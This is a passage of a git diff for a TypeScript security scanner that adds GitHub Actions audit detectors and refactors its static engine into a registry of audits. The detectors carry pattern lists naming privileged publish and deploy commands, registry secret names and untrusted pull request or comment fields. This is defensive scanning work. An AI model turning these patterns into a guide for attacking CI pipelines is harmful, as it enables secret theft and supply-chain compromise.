!isAlwaysCondition(candidate.condition) || + !isSensitiveExecution(candidate.run, candidate.uses) + ) { + continue; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [candidate.condition, candidate.run ?? "", candidate.uses ?? 
""], + fallbackValue: candidate.condition, + }); + + findings.push({ + rule_id: "workflow-unsound-condition", + finding_id: `WORKFLOW_UNSOUND_CONDITION-${input.filePath}-${candidate.jobId}-${candidate.stepIndex}`, + severity: "MEDIUM", + category: "CI_TRIGGER", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${candidate.jobId}.steps[${candidate.stepIndex}].if` }, + description: + "Workflow uses always() on a sensitive step, which can bypass expected failure gating", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-754", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Replace always() with explicit success and trust-boundary checks for sensitive steps", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + } + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-unsound-contains.ts b/src/layer2-static/detectors/workflow-unsound-contains.ts new file mode 100644 index 0000000..fba4546 --- /dev/null +++ b/src/layer2-static/detectors/workflow-unsound-contains.ts @@ -0,0 +1,115 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowUnsoundContainsInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +interface StepCondition { + jobId: string; + stepIndex: number; + condition: string; + run?: string; +} + +const PRIVILEGED_COMMANDS = ["publish", "deploy", "release", "gh release"]; +const UNTRUSTED_CONTAINS_PATTERNS = [ + /contains\s*\(\s*github\.event\.pull_request\.(?:title|body)/iu, + /contains\s*\(\s*github\.event\.comment\.body/iu, + /contains\s*\(\s*github\.event\.issue\.title/iu, +]; + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + 
+function gatherStepConditions(parsed: unknown): StepCondition[] { + const root = asRecord(parsed); + const jobs = asRecord(root?.jobs); + if (!jobs) { + return []; + } + + const candidates: StepCondition[] = []; + for (const [jobId, jobValue] of Object.entries(jobs)) { + const job = asRecord(jobValue); + const steps = Array.isArray(job?.steps) ? job.steps : []; + steps.forEach((stepValue, stepIndex) => { + const step = asRecord(stepValue); + if (!step || typeof step.if !== "string") { + return; + } + candidates.push({ + jobId, + stepIndex, + condition: step.if, + run: typeof step.run === "string" ? step.run : undefined, + }); + }); + } + return candidates; +} + +function isUnsoundContains(condition: string): boolean { + return UNTRUSTED_CONTAINS_PATTERNS.some((pattern) => pattern.test(condition)); +} + +function isPrivilegedStep(run: string | undefined): boolean { + const normalized = run?.toLowerCase() ?? ""; + return PRIVILEGED_COMMANDS.some((command) => normalized.includes(command)); +} + +export function detectWorkflowUnsoundContains(input: WorkflowUnsoundContainsInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const findings: Finding[] = []; + + for (const candidate of gatherStepConditions(input.parsed)) { + if (!isUnsoundContains(candidate.condition) || !isPrivilegedStep(candidate.run)) { + continue; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [candidate.condition, candidate.run ?? 
""], + fallbackValue: candidate.condition, + }); + + findings.push({ + rule_id: "workflow-unsound-contains", + finding_id: `WORKFLOW_UNSOUND_CONTAINS-${input.filePath}-${candidate.jobId}-${candidate.stepIndex}`, + severity: "HIGH", + category: "CI_TRIGGER", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${candidate.jobId}.steps[${candidate.stepIndex}].if` }, + description: "Workflow gates a privileged step with contains() over untrusted event content", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-20", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Avoid trust decisions based on contains() over untrusted titles, bodies, or comments", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + } + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-use-trusted-publishing.ts b/src/layer2-static/detectors/workflow-use-trusted-publishing.ts new file mode 100644 index 0000000..f56ff95 --- /dev/null +++ b/src/layer2-static/detectors/workflow-use-trusted-publishing.ts @@ -0,0 +1,87 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowUseTrustedPublishingInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +const PUBLISH_COMMANDS = ["npm publish", "pnpm publish", "yarn npm publish", "twine upload"]; +const TOKEN_NAMES = ["NODE_AUTH_TOKEN", "NPM_TOKEN", "TWINE_USERNAME", "TWINE_PASSWORD"]; + +function containsPublishCommand(value: string | undefined): boolean { + if (!value) { + return false; + } + return PUBLISH_COMMANDS.some((command) => value.includes(command)); +} + +function findTokenName(textContent: string): string | null { + for (const tokenName of TOKEN_NAMES) { + if (textContent.includes(tokenName)) { + return tokenName; + } + } + return null; +} + +export 
function detectWorkflowUseTrustedPublishing( + input: WorkflowUseTrustedPublishingInput, +): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const tokenName = findTokenName(input.textContent); + if (!tokenName) { + return []; + } + + const findings: Finding[] = []; + + facts.jobs.forEach((job, jobIndex) => { + job.steps.forEach((step, stepIndex) => { + if (!containsPublishCommand(step.run)) { + return; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [step.run ?? "", tokenName], + fallbackValue: step.run ?? tokenName, + }); + + findings.push({ + rule_id: "workflow-use-trusted-publishing", + finding_id: `WORKFLOW_USE_TRUSTED_PUBLISHING-${input.filePath}-${jobIndex}-${stepIndex}`, + severity: "HIGH", + category: "CI_PERMISSIONS", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.steps[${stepIndex}].run` }, + description: + "Package publication uses long-lived registry credentials instead of trusted publishing", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-798", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Switch package publishing to trusted publishing with OIDC and remove registry secrets", + ], + evidence: evidence?.evidence ?? 
null, + suppressed: false, + }); + }); + }); + + return findings; +} diff --git a/src/layer2-static/engine.ts b/src/layer2-static/engine.ts index 7dd2b77..50f9ec5 100644 --- a/src/layer2-static/engine.ts +++ b/src/layer2-static/engine.ts @@ -7,6 +7,42 @@ import { detectIdeSettingsIssues } from "./detectors/ide-settings.js"; import { detectPluginManifestIssues } from "./detectors/plugin-manifest.js"; import { detectRuleFileIssues } from "./detectors/rule-file.js"; import { detectSymlinkEscapes, type SymlinkEscapeEntry } from "./detectors/symlink.js"; +import { detectWorkflowExcessivePermissions } from "./detectors/workflow-excessive-permissions.js"; +import { detectWorkflowDangerousTriggers } from "./detectors/workflow-dangerous-triggers.js"; +import { detectWorkflowTemplateInjection } from "./detectors/workflow-template-injection.js"; +import { detectWorkflowKnownVulnAction } from "./detectors/workflow-known-vuln-action.js"; +import { detectWorkflowUnpinnedUses } from "./detectors/workflow-unpinned-uses.js"; +import { detectWorkflowArtipacked } from "./detectors/workflow-artipacked.js"; +import { detectWorkflowCachePoisoning } from "./detectors/workflow-cache-poisoning.js"; +import { detectWorkflowGithubEnv } from "./detectors/workflow-github-env.js"; +import { detectWorkflowInsecureCommands } from "./detectors/workflow-insecure-commands.js"; +import { detectWorkflowSelfHostedRunner } from "./detectors/workflow-self-hosted-runner.js"; +import { detectWorkflowOverprovisionedSecrets } from "./detectors/workflow-overprovisioned-secrets.js"; +import { detectWorkflowSecretsOutsideEnv } from "./detectors/workflow-secrets-outside-env.js"; +import { detectWorkflowSecretsInherit } from "./detectors/workflow-secrets-inherit.js"; +import { detectWorkflowUndocumentedPermissions } from "./detectors/workflow-undocumented-permissions.js"; +import { detectWorkflowUseTrustedPublishing } from "./detectors/workflow-use-trusted-publishing.js"; +import { detectWorkflowArchivedUses } 
from "./detectors/workflow-archived-uses.js"; +import { detectWorkflowStaleActionRefs } from "./detectors/workflow-stale-action-refs.js"; +import { detectWorkflowForbiddenUses } from "./detectors/workflow-forbidden-uses.js"; +import { detectWorkflowRefConfusion } from "./detectors/workflow-ref-confusion.js"; +import { detectWorkflowRefVersionMismatch } from "./detectors/workflow-ref-version-mismatch.js"; +import { detectWorkflowImpostorCommit } from "./detectors/workflow-impostor-commit.js"; +import { detectWorkflowUnpinnedImages } from "./detectors/workflow-unpinned-images.js"; +import { detectWorkflowAnonymousDefinition } from "./detectors/workflow-anonymous-definition.js"; +import { detectWorkflowConcurrencyLimits } from "./detectors/workflow-concurrency-limits.js"; +import { detectWorkflowSuperfluousActions } from "./detectors/workflow-superfluous-actions.js"; +import { detectWorkflowMisfeature } from "./detectors/workflow-misfeature.js"; +import { detectWorkflowObfuscation } from "./detectors/workflow-obfuscation.js"; +import { detectWorkflowUnsoundCondition } from "./detectors/workflow-unsound-condition.js"; +import { detectWorkflowUnsoundContains } from "./detectors/workflow-unsound-contains.js"; +import { detectDependabotCooldown } from "./detectors/dependabot-cooldown.js"; +import { detectDependabotExecution } from "./detectors/dependabot-execution.js"; +import { detectWorkflowHardcodedContainerCredentials } from "./detectors/workflow-hardcoded-container-credentials.js"; +import { detectWorkflowUnredactedSecrets } from "./detectors/workflow-unredacted-secrets.js"; +import { detectWorkflowBotConditions } from "./detectors/workflow-bot-conditions.js"; +import { filterRegisteredAudits, type RegisteredAudit } from "./audits/registry.js"; +import type { AuditPersona, RuntimeMode } from "../config.js"; import { FINDING_CATEGORIES, type Finding } from "../types/finding.js"; import type { DiscoveryFormat } from "../types/discovery.js"; import { 
buildFindingEvidence } from "./evidence.js"; @@ -31,6 +67,10 @@ export interface StaticEngineConfig { rulePackPaths?: string[]; allowedRules?: string[]; skipRules?: string[]; + persona?: AuditPersona; + runtimeMode?: RuntimeMode; + workflowAuditsEnabled?: boolean; + rulePolicies?: Record }>; } export interface StaticEngineInput { @@ -50,6 +90,15 @@ const GENERIC_AFFECTED_TOOLS = [ "github-copilot", ]; +interface FileAuditContext { + file: StaticFileInput; + input: StaticEngineInput; +} + +interface GlobalAuditContext { + input: StaticEngineInput; +} + function parseRuleSeverity(value: string): Finding["severity"] { const normalized = value.trim().toUpperCase(); if ( @@ -78,6 +127,26 @@ function remediationActionsForRule(rule: DetectionRule): string[] { return ["remove_field", "replace_with_default"]; } +function resolveDisabledAuditIds( + policies: StaticEngineConfig["rulePolicies"] | undefined, +): string[] { + if (!policies) { + return []; + } + + return Object.entries(policies) + .filter(([, policy]) => policy?.disable === true) + .map(([ruleId]) => ruleId); +} + +function findRulePolicyConfig( + policies: StaticEngineConfig["rulePolicies"] | undefined, + ruleId: string, +): Record | undefined { + const config = policies?.[ruleId]?.config; + return config && typeof config === "object" ? config : undefined; +} + function findingFromRulePackMatch(file: StaticFileInput, rule: DetectionRule): Finding { const locationField = rule.query_type === "text_pattern" ? 
"content" : rule.query; const evidence = buildFindingEvidence({ @@ -154,8 +223,489 @@ function dedupeFindings(findings: Finding[]): Finding[] { return Array.from(deduped.values()); } -export function runStaticEngine(input: StaticEngineInput): Finding[] { +function buildFileAudits(): Array> { + return [ + { + id: "env-overrides", + run: ({ file, input }) => + detectEnvOverrides({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + trustedApiDomains: input.config.trustedApiDomains, + }), + }, + { + id: "consent-bypass", + run: ({ file, input }) => + detectConsentBypass({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + trustedApiDomains: input.config.trustedApiDomains, + }), + }, + { + id: "command-execution", + run: ({ file, input }) => + detectCommandExecution({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + knownSafeMcpServers: input.config.knownSafeMcpServers, + knownSafeFormatters: input.config.knownSafeFormatters, + knownSafeLspServers: input.config.knownSafeLspServers, + blockedCommands: input.config.blockedCommands, + }), + }, + { + id: "ide-settings", + run: ({ file, input }) => + input.config.checkIdeSettings + ? detectIdeSettingsIssues({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + projectRoot: input.projectRoot, + }) + : [], + }, + { + id: "plugin-manifest", + run: ({ file, input }) => + detectPluginManifestIssues({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + trustedApiDomains: input.config.trustedApiDomains, + blockedCommands: input.config.blockedCommands, + }), + }, + { + id: "advisory-intelligence", + run: ({ file }) => + detectAdvisoryIntelligence({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }), + }, + { + id: "rule-file", + run: ({ file, input }) => + file.format === "text" || file.format === "markdown" + ? 
detectRuleFileIssues({ + filePath: file.filePath, + textContent: file.textContent, + unicodeAnalysis: input.config.unicodeAnalysis, + }) + : [], + }, + { + id: "workflow-unpinned-uses", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowUnpinnedUses({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-dangerous-triggers", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowDangerousTriggers({ + filePath: file.filePath, + parsed: file.parsed, + }) + : [], + }, + { + id: "workflow-excessive-permissions", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowExcessivePermissions({ + filePath: file.filePath, + parsed: file.parsed, + }) + : [], + }, + { + id: "workflow-template-injection", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowTemplateInjection({ + filePath: file.filePath, + parsed: file.parsed, + }) + : [], + }, + { + id: "workflow-known-vuln-action", + onlineRequired: true, + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowKnownVulnAction({ + filePath: file.filePath, + parsed: file.parsed, + runtimeMode: input.config.runtimeMode, + }) + : [], + }, + { + id: "workflow-artipacked", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowArtipacked({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-cache-poisoning", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowCachePoisoning({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-github-env", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? 
detectWorkflowGithubEnv({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-insecure-commands", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowInsecureCommands({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-self-hosted-runner", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowSelfHostedRunner({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-overprovisioned-secrets", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowOverprovisionedSecrets({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-secrets-outside-env", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowSecretsOutsideEnv({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-secrets-inherit", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowSecretsInherit({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-undocumented-permissions", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowUndocumentedPermissions({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-use-trusted-publishing", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowUseTrustedPublishing({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-archived-uses", + onlineRequired: true, + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? 
detectWorkflowArchivedUses({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-stale-action-refs", + onlineRequired: true, + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowStaleActionRefs({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-forbidden-uses", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowForbiddenUses({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + config: findRulePolicyConfig(input.config.rulePolicies, "workflow-forbidden-uses"), + }) + : [], + }, + { + id: "workflow-ref-confusion", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowRefConfusion({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-ref-version-mismatch", + onlineRequired: true, + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowRefVersionMismatch({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + runtimeMode: input.config.runtimeMode, + }) + : [], + }, + { + id: "workflow-impostor-commit", + onlineRequired: true, + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowImpostorCommit({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + runtimeMode: input.config.runtimeMode, + }) + : [], + }, + { + id: "workflow-unpinned-images", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowUnpinnedImages({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-anonymous-definition", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? 
detectWorkflowAnonymousDefinition({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-concurrency-limits", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowConcurrencyLimits({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-superfluous-actions", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowSuperfluousActions({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-misfeature", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowMisfeature({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-obfuscation", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowObfuscation({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-unsound-condition", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowUnsoundCondition({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-unsound-contains", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowUnsoundContains({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "dependabot-cooldown", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectDependabotCooldown({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "dependabot-execution", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? 
detectDependabotExecution({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "hardcoded-container-credentials", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowHardcodedContainerCredentials({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "unredacted-secrets", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowUnredactedSecrets({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "bot-conditions", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowBotConditions({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + ]; +} + +function buildGlobalAudits(): Array> { + return [ + { + id: "symlink-escapes", + run: ({ input }) => detectSymlinkEscapes({ symlinkEscapes: input.symlinkEscapes }), + }, + { + id: "git-hooks", + run: ({ input }) => + detectGitHookIssues({ hooks: input.hooks, knownSafeHooks: input.config.knownSafeHooks }), + }, + ]; +} + +export async function runStaticEngine(input: StaticEngineInput): Promise { const findings: Finding[] = []; + const runtimeSelection = { + persona: input.config.persona, + runtimeMode: input.config.runtimeMode, + disabledAuditIds: resolveDisabledAuditIds(input.config.rulePolicies), + }; + const activeFileAudits = filterRegisteredAudits(buildFileAudits(), runtimeSelection); + const activeGlobalAudits = filterRegisteredAudits(buildGlobalAudits(), runtimeSelection); const rulePackRules = loadRulePacks({ rule_pack_paths: input.config.rulePackPaths ?? [], allowed_rules: input.config.allowedRules ?? 
[], @@ -163,73 +713,8 @@ export function runStaticEngine(input: StaticEngineInput): Finding[] { }); for (const file of input.files) { - findings.push( - ...detectEnvOverrides({ - filePath: file.filePath, - parsed: file.parsed, - textContent: file.textContent, - trustedApiDomains: input.config.trustedApiDomains, - }), - ); - - findings.push( - ...detectConsentBypass({ - filePath: file.filePath, - parsed: file.parsed, - textContent: file.textContent, - trustedApiDomains: input.config.trustedApiDomains, - }), - ); - - findings.push( - ...detectCommandExecution({ - filePath: file.filePath, - parsed: file.parsed, - textContent: file.textContent, - knownSafeMcpServers: input.config.knownSafeMcpServers, - knownSafeFormatters: input.config.knownSafeFormatters, - knownSafeLspServers: input.config.knownSafeLspServers, - blockedCommands: input.config.blockedCommands, - }), - ); - - if (input.config.checkIdeSettings) { - findings.push( - ...detectIdeSettingsIssues({ - filePath: file.filePath, - parsed: file.parsed, - textContent: file.textContent, - projectRoot: input.projectRoot, - }), - ); - } - - findings.push( - ...detectPluginManifestIssues({ - filePath: file.filePath, - parsed: file.parsed, - textContent: file.textContent, - trustedApiDomains: input.config.trustedApiDomains, - blockedCommands: input.config.blockedCommands, - }), - ); - - findings.push( - ...detectAdvisoryIntelligence({ - filePath: file.filePath, - parsed: file.parsed, - textContent: file.textContent, - }), - ); - - if (file.format === "text" || file.format === "markdown") { - findings.push( - ...detectRuleFileIssues({ - filePath: file.filePath, - textContent: file.textContent, - unicodeAnalysis: input.config.unicodeAnalysis, - }), - ); + for (const audit of activeFileAudits) { + findings.push(...(await audit.run({ file, input }))); } for (const rule of rulePackRules) { @@ -251,10 +736,9 @@ export function runStaticEngine(input: StaticEngineInput): Finding[] { } } - findings.push(...detectSymlinkEscapes({ 
symlinkEscapes: input.symlinkEscapes })); - findings.push( - ...detectGitHookIssues({ hooks: input.hooks, knownSafeHooks: input.config.knownSafeHooks }), - ); + for (const audit of activeGlobalAudits) { + findings.push(...(await audit.run({ input }))); + } return dedupeFindings(findings); } diff --git a/src/layer2-static/github/cache.ts b/src/layer2-static/github/cache.ts new file mode 100644 index 0000000..3eefea0 --- /dev/null +++ b/src/layer2-static/github/cache.ts @@ -0,0 +1,59 @@ +import { existsSync, mkdirSync, readFileSync, writeFileSync } from "node:fs"; +import { join } from "node:path"; + +export interface AdvisoryPayload { + generatedAt: number; + advisories: Record; +} + +export const GITHUB_METADATA_CACHE_FILE = "gha-advisories.json"; + +export function resolveGithubMetadataCachePath(cacheDir: string): string { + return join(cacheDir, GITHUB_METADATA_CACHE_FILE); +} + +function isRecord(value: unknown): value is Record { + return typeof value === "object" && value !== null && !Array.isArray(value); +} + +function isAdvisoryPayload(value: unknown): value is AdvisoryPayload { + if (!isRecord(value) || typeof value.generatedAt !== "number") { + return false; + } + if (!isRecord(value.advisories)) { + return false; + } + + return Object.values(value.advisories).every( + (entry) => Array.isArray(entry) && entry.every((item) => typeof item === "string"), + ); +} + +export function loadCachedAdvisoryPayload( + cacheDir: string, + maxAgeMs: number, + now = Date.now(), +): AdvisoryPayload | null { + const path = resolveGithubMetadataCachePath(cacheDir); + if (!existsSync(path)) { + return null; + } + + try { + const parsed = JSON.parse(readFileSync(path, "utf8")) as unknown; + if (!isAdvisoryPayload(parsed)) { + return null; + } + if (now - parsed.generatedAt > maxAgeMs) { + return null; + } + return parsed; + } catch { + return null; + } +} + +export function saveCachedAdvisoryPayload(cacheDir: string, payload: AdvisoryPayload): void { + mkdirSync(cacheDir, { 
recursive: true }); + writeFileSync(resolveGithubMetadataCachePath(cacheDir), JSON.stringify(payload, null, 2), "utf8"); +} diff --git a/src/layer2-static/github/client.ts b/src/layer2-static/github/client.ts new file mode 100644 index 0000000..09e8ec3 --- /dev/null +++ b/src/layer2-static/github/client.ts @@ -0,0 +1,76 @@ +import { homedir } from "node:os"; +import { join } from "node:path"; +import type { RuntimeMode } from "../../config.js"; +import bundledAdvisories from "../advisories/gha-known-vulnerable-actions.json" with { type: "json" }; +import { + loadCachedAdvisoryPayload, + saveCachedAdvisoryPayload, + type AdvisoryPayload, +} from "./cache.js"; + +function normalizeAdvisoryMap(value: Record): Record { + const normalized: Record = {}; + for (const [action, versions] of Object.entries(value)) { + normalized[action.toLowerCase()] = versions.map((version) => version.toLowerCase()); + } + return normalized; +} + +export interface GithubMetadataClientOptions { + runtimeMode?: RuntimeMode; + cacheDir?: string; + cacheMaxAgeMs?: number; + now?: number; +} + +export interface GithubMetadataClient { + runtimeMode: RuntimeMode; + cacheDir: string; + cacheMaxAgeMs: number; + isOnlineEnabled(): boolean; + loadKnownVulnerableActions(bundle: Record): AdvisoryPayload; +} + +export function createGithubMetadataClient( + options: GithubMetadataClientOptions = {}, +): GithubMetadataClient { + const runtimeMode = options.runtimeMode ?? "offline"; + const cacheDir = options.cacheDir ?? join(homedir(), ".codegate", "cache"); + const cacheMaxAgeMs = options.cacheMaxAgeMs ?? 24 * 60 * 60 * 1000; + const now = options.now ?? 
Date.now(); + + return { + runtimeMode, + cacheDir, + cacheMaxAgeMs, + isOnlineEnabled() { + return runtimeMode === "online"; + }, + loadKnownVulnerableActions(bundle: Record): AdvisoryPayload { + const payload: AdvisoryPayload = { + generatedAt: now, + advisories: normalizeAdvisoryMap(bundle), + }; + + if (!runtimeMode || runtimeMode !== "online") { + return payload; + } + + const cached = loadCachedAdvisoryPayload(cacheDir, cacheMaxAgeMs, now); + if (cached) { + return cached; + } + + saveCachedAdvisoryPayload(cacheDir, payload); + return payload; + }, + }; +} + +export function loadBundledGithubAdvisories( + options: GithubMetadataClientOptions = {}, +): AdvisoryPayload { + return createGithubMetadataClient(options).loadKnownVulnerableActions( + bundledAdvisories as Record, + ); +} diff --git a/src/layer2-static/workflow/injection-sinks.json b/src/layer2-static/workflow/injection-sinks.json new file mode 100644 index 0000000..9aef069 --- /dev/null +++ b/src/layer2-static/workflow/injection-sinks.json @@ -0,0 +1,5 @@ +{ + "actions/github-script": ["script"], + "azure/powershell": ["inlineScript"], + "addnab/docker-run-action": ["run", "options"] +} diff --git a/src/layer2-static/workflow/parser.ts b/src/layer2-static/workflow/parser.ts new file mode 100644 index 0000000..2ceb3d1 --- /dev/null +++ b/src/layer2-static/workflow/parser.ts @@ -0,0 +1,108 @@ +import type { WorkflowFacts, WorkflowJobFacts, WorkflowStepFacts } from "./types.js"; + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +function asString(value: unknown): string | undefined { + return typeof value === "string" ? 
value : undefined; +} + +function normalizeWorkflowPath(value: string): string { + return value.replaceAll("\\", "/"); +} + +export function isGitHubWorkflowPath(path: string): boolean { + return /(?:^|\/)\.github\/workflows\/[^/]+\.ya?ml$/iu.test(normalizeWorkflowPath(path)); +} + +function extractTriggers(value: unknown): string[] { + if (typeof value === "string") { + return [value]; + } + if (Array.isArray(value)) { + return value.filter((entry): entry is string => typeof entry === "string"); + } + + const record = asRecord(value); + if (!record) { + return []; + } + + return Object.keys(record); +} + +function extractStepFacts(step: unknown): WorkflowStepFacts | null { + const stepRecord = asRecord(step); + if (!stepRecord) { + return null; + } + + const withValues = asRecord(stepRecord.with); + const withEntries: Record = {}; + if (withValues) { + for (const [key, value] of Object.entries(withValues)) { + if (typeof value === "string") { + withEntries[key] = value; + } + } + } + + const stepFacts: WorkflowStepFacts = { + uses: asString(stepRecord.uses), + run: asString(stepRecord.run), + with: Object.keys(withEntries).length > 0 ? withEntries : undefined, + }; + + if (!stepFacts.uses && !stepFacts.run) { + return null; + } + + return stepFacts; +} + +function extractJobFacts(id: string, value: unknown): WorkflowJobFacts | null { + const jobRecord = asRecord(value); + if (!jobRecord) { + return null; + } + + const stepsRaw = Array.isArray(jobRecord.steps) ? jobRecord.steps : []; + const steps = stepsRaw + .map((step) => extractStepFacts(step)) + .filter((step): step is WorkflowStepFacts => step !== null); + + return { + id, + permissions: jobRecord.permissions, + steps, + }; +} + +export function extractWorkflowFacts(parsed: unknown): WorkflowFacts | null { + const root = asRecord(parsed); + if (!root) { + return null; + } + + const triggers = extractTriggers(root.on); + const jobsRecord = asRecord(root.jobs); + const jobs: WorkflowJobFacts[] = jobsRecord + ? 
